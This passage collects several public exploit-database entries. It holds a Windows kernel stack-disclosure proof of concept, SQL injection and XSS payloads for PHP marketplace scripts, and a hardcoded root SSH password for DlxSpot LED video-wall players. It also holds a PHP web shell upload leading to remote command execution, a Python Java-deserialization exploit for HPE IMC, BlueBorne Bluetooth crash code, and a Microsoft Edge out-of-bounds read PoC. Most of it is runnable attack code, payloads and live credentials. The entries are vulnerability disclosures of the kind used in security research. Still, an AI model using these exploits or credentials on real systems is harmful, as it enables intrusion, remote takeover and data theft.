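    return FALSE;
  }
  return TRUE;
}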
LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
  // Inspect the callback payload, then always forward it to the original thunk.
  // NOTE(review): the constants 0x1c, 0x39/0x3a and slot 6 come from the original
  // report and are not explained in this file — presumably a message size, two
  // message ids, and the position of the pointer to the 8 leaked bytes; confirm
  // against the target build.
  const LPDWORD fields = (LPDWORD)Data;
  const BOOL interesting = fields[0] == 0x1c && (fields[1] == 0x39 || fields[1] == 0x3a);
  if (interesting) {
    const LPDWORD leaked = (LPDWORD)fields[6];
    printf("[+] Leaked data: %.8x %.8x\n", leaked[0], leaked[1]);
  }
  return globals::OrigClientPrinterThunk(Data);
}
int main() {
  // Install the hook on user32!ClientPrinterThunk (dispatch table slot 93) so the
  // callback payload can be inspected on its way back to user mode.
  if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
    printf("Hooking ClientPrinterThunk failed.\n");
    return 1;
  }

  // Obtain a DC for the default printer without showing the dialog; the job is
  // directed to a file so no physical output is produced.
  PRINTDLGA print_dialog = { 0 };
  print_dialog.lStructSize = sizeof(print_dialog);
  print_dialog.Flags = PD_RETURNDEFAULT | PD_ALLPAGES | PD_RETURNDC | PD_PRINTTOFILE;
  print_dialog.nFromPage = 1;
  print_dialog.nToPage = 1;
  print_dialog.nCopies = 1;
  if (!PrintDlgA(&print_dialog)) {
    printf("PrintDlgA failed.\n");
    return 1;
  }
  HDC printer = print_dialog.hDC;

  // Open a one-page document on that DC.
  DOCINFOA document = { 0 };
  document.cbSize = sizeof(document);
  document.lpszDocName = "Document";
  document.lpszOutput = "C:\\Windows\\Temp\\output";
  if (StartDocA(printer, &document) <= 0) {
    printf("StartDoc failed.\n");
    return 1;
  }
  if (StartPage(printer) <= 0) {
    printf("StartPage failed.\n");
    return 1;
  }

  // Finishing the page drives the banding path described in the report above;
  // this is where the hooked callback observes the leaked bytes.
  EndPage(printer);

  // Tear down the job and the DC.
  EndDoc(printer);
  DeleteDC(printer);
  return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307
We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Windows 10 32-bit.
The output buffer and the corresponding temporary stack-based buffer in the kernel are 0x308 bytes in size. The first 4 and the trailing 0x300 bytes are zeroed out at the beginning of the function:
--- cut ---
.text:0001939B mov [ebp+var_324], ebx
.text:000193A1 push 300h ; size_t
.text:000193A6 push ebx ; int
.text:000193A7 lea eax, [ebp+var_31C]
.text:000193AD push eax ; void *
.text:000193AE call _memset
--- cut ---
However, the remaining 4 bytes at offset 0x4 are never touched, and so they contain whatever data was written there by the previous system call. These 4 bytes are then subsequently leaked to the user-mode caller. Exploitation of this bug is further facilitated by the fact that the contents of the buffer are copied back to user-mode even if the syscall fails (e.g. composition surface handle can't be resolved etc).
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 41 41 41 41 00 00 00 00 00 00 00 00 ....AAAA........
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000300: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
It is clearly visible here that among all data copied from ring-0 to ring-3, 4 bytes at offset 0x4 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// Native API prototype, declared here because the public SDK headers do not
// expose it; used by SprayKernelStack() below. NOTE(review): presumably
// resolved from ntdll at link time — confirm the import library used.
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
// Raw 32-bit system call stub (MSVC x86 inline asm only): eax carries the
// service number, edx is pointed at the variadic arguments that follow
// ApiNumber on the stack, and "int 0x2e" enters the kernel through the legacy
// interrupt gate. There is no return statement: the caller relies on whatever
// the kernel left in eax, which is compiler-specific behaviour.
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  // Classic hex dump: per row an 8-digit offset, 16 hex bytes, then an ASCII
  // column. Positions past the end of the buffer print as "??" / "." so the
  // final row keeps its width.
  const ULONG kRowWidth = 16;
  for (ULONG offset = 0; offset < dwBytes; offset += kRowWidth) {
    printf("%.8x: ", offset);
    ULONG column;
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      if (index < dwBytes)
        printf("%.2x ", Data[index]);
      else
        printf("?? ");
    }
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      BYTE value = (index < dwBytes) ? Data[index] : 0;
      // Only printable 7-bit ASCII is echoed; everything else is a dot.
      putchar((index < dwBytes && value >= 0x20 && value <= 0x7e) ? value : '.');
    }
    putchar('\n');
  }
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
  // Byte-wise fill of `size` bytes starting at `ptr` with `byte`.
  // NOTE(review): a hand-rolled fill rather than memset(); the reason is not
  // stated in this file — confirm whether a CRT-free build is intended.
  PBYTE end = ptr + size;
  while (ptr != end) {
    *ptr++ = byte;
  }
}
// Leaves 'A' marker bytes on the kernel stack so that uninitialized data
// returned later by the affected syscall is recognizable in the hex dump.
// The same static buffer is passed both as the base address and as the
// page-frame array; the call's return status is deliberately ignored.
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
  // Service number of NtQueryCompositionSurfaceBinding on Windows 10 1607 32-bit;
  // it differs per build.
  CONST ULONG __NR_NtQueryCompositionSurfaceBinding = 0x13e0;

  // Loading user32 turns this thread into a GUI thread so win32k services are reachable.
  LoadLibrary(L"user32.dll");

  // Leave recognizable marker bytes on the kernel stack before the syscall.
  SprayKernelStack();

  // Issue the syscall with a zeroed 0x308-byte output buffer and dump whatever
  // came back. The status is intentionally not checked: per the report above the
  // buffer is copied back to user mode even when the call fails.
  BYTE output[0x308] = { /* zero padding */ };
  SystemCall32(__NR_NtQueryCompositionSurfaceBinding, 0, 0, output);
  PrintHex(output, sizeof(output));
  return 0;
}
# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
# Date: 2017-09-15
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Version: 1.20
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-15
Product & Service Introduction:
===============================
Designed to launch an online market place facilitating participation of professionals from diverse walks of life.
Technical Details & Description:
================================
SQL injection on [cat] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
# CVE: CVE-2017-12928
# Linked CVE's: CVE-2017-12929, CVE-2017-12930
# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Hardcoded password for all dlxspot players, login with the following credentials via SSH
username: dlxuser
password: tecn0visi0n
Escalate to root with the same password.
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login. It can be exploited by entering the
following credentials (the password is a tautology, so no valid password is needed):
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
# Date: 2017-09-13
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-13
Product & Service Introduction:
===============================
Foodspotting Clone lets you set up your own social networking website with a look and feel similar to Foodspotting and other food-lover websites.
Technical Details & Description:
================================
Reflected XSS/SQL injection on [resid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Parameter: resid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp
Reflected XSS:
http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import os
import os.path
import subprocess
import sys

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""
def printUsage():
    """Print the command-line help for both payload modes to stdout.

    Only reads sys.argv[0] (the script name) for the usage examples; the
    example IP/port values are illustrative placeholders.
    """
    me = sys.argv[0]
    banner = "......................................................................................................................"
    lines = [
        banner,
        ".",
        ". HPE/H3C - IMC Java Deserialization Exploit",
        ".",
        ". Example 1: -payload-binary",
        ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % me,
        ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % me,
        ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) ",
        ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin",
        ". 2. Send request to server",
        ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % me,
        ".",
        ". Example 2: -payload-string",
        '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % me,
        '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % me,
        ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)",
        '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % me,
        ".",
        banner,
    ]
    for line in lines:
        print(line)
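def loadPayloadFile(_fileName):
    """Read the serialized payload at *_fileName* and return its raw bytes.

    The file is opened in binary mode so the Java serialization stream is
    passed through untouched. The handle is closed on return (the original
    left it open). Raises IOError/OSError if the file cannot be opened.
    """
    print("[+] Load payload file %s" % _fileName)
    with open(_fileName, 'rb') as payloadFile:
        return payloadFile.read()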
def exploit(_payload):
    """POST the raw serialized object to IMC's WebDMServlet and return the response.

    The target base URL is taken from sys.argv[1] (not from the module-level
    ``host``). The servlet deserializes the request body, which is what the
    ysoserial gadget chain in *_payload* relies on.
    """
    target = "%s/imc/topo/WebDMServlet" % sys.argv[1]
    print("[+] Sending exploit to %s" % target)
    # verify=False: TLS certificate validation is disabled (IMC typically runs with
    # a self-signed certificate). Acceptable for a lab target, but it also means
    # the exploit traffic can be intercepted or redirected by anyone on path.
    return requests.post(target, data=_payload, verify=False)
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
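if __name__ == "__main__":
    # Usage: <url> -payload-binary <file>   |   <url> -payload-string "<command>"
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)

    print("------------------------------------------")
    print("- HPE/H3C - IMC Java Deserialization Exploit -")
    print("------------------------------------------")
    host = sys.argv[1]
    print("[*] Connecting to %s" % host)

    if sys.argv[2] == "-payload-binary":
        # Send a pre-built serialized object (e.g. ysoserial output) as-is.
        payload_file = sys.argv[3]
        if os.path.isfile(payload_file):
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            # The original called showResponse() here, whose definition is commented
            # out above, so this branch died with NameError after the request had
            # already been sent. Report the HTTP status instead; whether the gadget
            # chain ran is only observable out-of-band (e.g. the ping in the usage).
            print("[+] Response received (HTTP %d), exploit finished." % response.status_code)
        else:
            print("[-] Can't load payload file")
    elif sys.argv[2] == "-payload-string":
        # Build the payload locally with ysoserial (CommonsCollections5 chain; the
        # usage text shows CommonsCollections3 for the manual route -- either may
        # need changing depending on the target's classpath).
        if os.path.isfile("ysoserial.jar"):
            sPayload = sys.argv[3]
            cmd = ["java", "-jar", "ysoserial.jar", "CommonsCollections5", sPayload]
            print("[+] Create payload file (%s) " % " ".join(cmd))
            # argv list + stdout redirect instead of os.system() with a single-quoted
            # shell string: the command reaches ysoserial verbatim (no quoting pitfalls,
            # no shell interpretation of the operator's input) and a failed java run
            # is no longer silently ignored.
            try:
                with open(payload_file, "wb") as out:
                    subprocess.check_call(cmd, stdout=out)
            except (OSError, subprocess.CalledProcessError) as e:
                print("[-] Failed to run ysoserial: %s" % e)
                sys.exit(1)
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            print("[+] Response received (HTTP %d), exploit finished." % response.status_code)
        else:
            print("[-] Can't load ysoserial.jar")
    else:
        printUsage()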
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -
DoS (Crash) only
# Date: 09/21/2017
# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
# Version: Linux kernel v3.3-rc1 and every later unpatched version (the vulnerable code was introduced in v3.3-rc1)
# Tested on: Linux 4.4.0-93-generic #116
# CVE : CVE-2017-1000251
# Provided for legal security research and testing purposes ONLY.
Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload
Written after reading a great deal of documentation and the relevant protocol specifications.
1) Install Scapy
https://github.com/secdev/scapy
Add (or replace, if they already exist) the following L2CAP configuration request/response packet classes in scapy's Bluetooth layer:
scapy/layers/bluetooth.py
class L2CAP_ConfReq(Packet):
    # L2CAP Configuration Request (signalling code 0x04) as used by the PoC.
    # After the fixed header (dcid, flags) the remaining fields spell out ONE
    # configuration option with a 16-byte body. The sender script passes
    # type=0x06 / length=16, which matches the layout of the Extended Flow
    # Specification option (identifier, service type, max SDU size, SDU
    # inter-arrival time, access latency, flush timeout) -- confirm against the
    # Bluetooth Core spec before relying on the field names.
    name = "L2CAP Conf Req"
    fields_desc = [ LEShortField("dcid",0),
                    LEShortField("flags",0),
                    # option header: type, length
                    ByteField("type",0),
                    ByteField("length",0),
                    # option body (16 bytes as sent by the PoC)
                    ByteField("identifier",0),
                    ByteField("servicetype",0),
                    LEShortField("sdusize",0),
                    LEIntField("sduarrtime",0),
                    LEIntField("accesslat",0),
                    LEIntField("flushtime",0),
                    ]
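class L2CAP_ConfResp(Packet):
    """L2CAP Configuration Response (signalling code 0x05) as used by the PoC.

    Layout: fixed header (scid, flags, result) followed by 70 configuration
    options, each a 4-byte (type, length, value) triple. Field names are
    type0/length0/option0 ... type69/length69/option69 -- identical to the
    hand-expanded original, so the sender script's keyword arguments still
    apply. The sender fills every triple with an MTU option (type 1, length 2)
    behind result=0x04 (Pending); that oversized pending response is the input
    this CVE-2017-1000251 PoC relies on.
    """
    name = "L2CAP Conf Resp"
    fields_desc = [
        LEShortField("scid", 0),
        LEShortField("flags", 0),
        LEShortField("result", 0),
    ]
    # 70 option slots, generated instead of spelled out by hand. A generator
    # (not a list comprehension) so no loop variable leaks into the class
    # namespace under Python 2.
    fields_desc += list(
        f
        for i in range(70)
        for f in (
            ByteField("type%d" % i, 0),
            ByteField("length%d" % i, 0),
            LEShortField("option%d" % i, 0),
        )
    )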
2) Exploit
bluebornexploit.py
------------------------
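from scapy.all import *

# Bluetooth address (BD_ADDR) of the device to crash -- replace with the target's.
TARGET = "00:1A:7D:DA:71:13"

# Configuration Request (code 4) carrying one 16-byte option of type 0x06 with
# every value maxed out. Parenthesised: the original broke the line after '/',
# which is a syntax error outside brackets.
pkt = L2CAP_CmdHdr(code=4) / L2CAP_ConfReq(
    type=0x06, length=16, identifier=1, servicetype=0x0,
    sdusize=0xffff, sduarrtime=0xffffffff, accesslat=0xffffffff, flushtime=0xffffffff)

# Configuration Response (code 5) with result 0x04 (Pending) and 70 identical
# options: type 1 (MTU), length 2, value 2000. Same keyword set the original
# spelled out by hand (which had also been split mid-number by line wrapping).
_opts = {}
for i in range(70):
    _opts["type%d" % i] = 1
    _opts["length%d" % i] = 2
    _opts["option%d" % i] = 2000
pkt1 = L2CAP_CmdHdr(code=5) / L2CAP_ConfResp(result=0x04, **_opts)

bt = BluetoothL2CAPSocket(TARGET)
bt.send(pkt)
bt.send(pkt1)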
bluetoothsrv.py
--------------------
from scapy.all import *
# Counterpart used in the demo: open an L2CAP socket towards the given address
# and block on a single receive. The address is whatever BluetoothL2CAPSocket
# expects (in scapy it is the peer to connect to, not a local bind address) --
# replace the placeholder with the real BD_ADDR; TODO confirm against the scapy
# version in use.
bt = BluetoothL2CAPSocket("01:02:03:04:05:06")
bt.recv()
DEMO:
https://imgur.com/a/zcvLb
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
PoC:
==========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function go() {
  // Edge (EdgeHTML 14/15) out-of-bounds read PoC, Project Zero issue 1301.
  // The DOM mutations below, in this exact order, leave the <select>'s cached
  // options array out of sync with the length the collection reports. The
  // analysis following the PoC is the only ground for what each step does, so
  // the sequence is deliberately left untouched.
  select1.multiple = false;
  var optgroup = document.createElement("optgroup");
  select1.add(optgroup);
  // Hold on to the live HTMLOptionsCollection before the remaining mutations.
  var options = select1.options;
  select2 = document.createElement("select");
  textarea.setSelectionRange(0,1000000);
  select1.length = 2;
  // Move the textarea inside the first <option>, then run an editing command on
  // the selection while select1 is contenteditable.
  document.getElementsByTagName('option')[0].appendChild(textarea);
  select1.multiple = true;
  textarea.setSelectionRange(0,1000000);
  document.execCommand("insertOrderedList", false);
  select2.length = 100;
  select2.add(optgroup);
  // Per the analysis: options.length now reports 102, while the options cache
  // buffer actually holds only 2 entries.
  //alert(options.length);
  // The out-of-bounds read: index 4 is past the 2-entry cache (any index can be
  // chosen here). Without Page Heap the crash usually needs several reloads.
  var test = options[4];
  //alert(test);
}
</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<select id="select1" contenteditable="true"></select>
<!--
=========================================
Preliminary analysis:
When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem (see Debug Log 1 below) which corresponds to 'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.
Debug log 1:
=========================================
(1790.17bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
